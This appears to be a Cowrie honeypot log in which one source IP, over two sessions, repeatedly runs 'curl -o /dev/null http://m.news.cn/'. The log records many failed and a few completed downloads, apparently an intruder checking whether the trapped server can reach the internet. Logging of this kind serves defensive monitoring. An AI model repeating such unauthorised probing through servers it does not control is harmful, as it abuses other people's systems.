{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.276774Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.277988Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.282351Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.283339Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.299592Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.301231Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.349338Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.351225Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.366606Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.367927Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.370502Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.371423Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.412340Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.414032Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.416482Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.417672Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.419726Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.420815Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.457004Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.458438Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.462233Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.463703Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.495825Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.496951Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.503752Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.504934Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.509547Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.510866Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.535061Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.536259Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.541176Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.542245Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.571824Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.573012Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.578346Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.579477Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.589226Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.590988Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.601421Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.607142Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.608176Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.620304Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.621307Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.635571Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.653059Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.654195Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.662604Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.663792Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.685544Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.686613Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.689045Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.690923Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.703358Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.704458Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.732633Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.734006Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.775727Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.791662Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.792954Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.795645Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.805949Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.807099Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.834363Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.835994Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.868723Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.870229Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.871882Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.874194Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.881302Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.882419Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.926019Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.927234Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.928826Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.933596Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.934688Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.937375Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.947790Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:09.967820Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.968971Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.976461Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:09.995964Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.021558Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.022969Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.026855Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.028922Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.067968Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.077209Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.078561Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.111016Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.123950Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.125436Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.133784Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.149792Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.151133Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.160885Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.171798Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.172875Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.185935Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.187379Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.188837Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.215688Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.216954Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.219046Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.230957Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.232050Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.267747Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.268947Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.276010Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.277272Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.278438Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.293932Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.315620Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.340981Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.343052Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.352574Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.353830Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.357123Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.358831Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.375583Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.400429Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.401785Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.440582Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:10.441809Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:10.472744Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
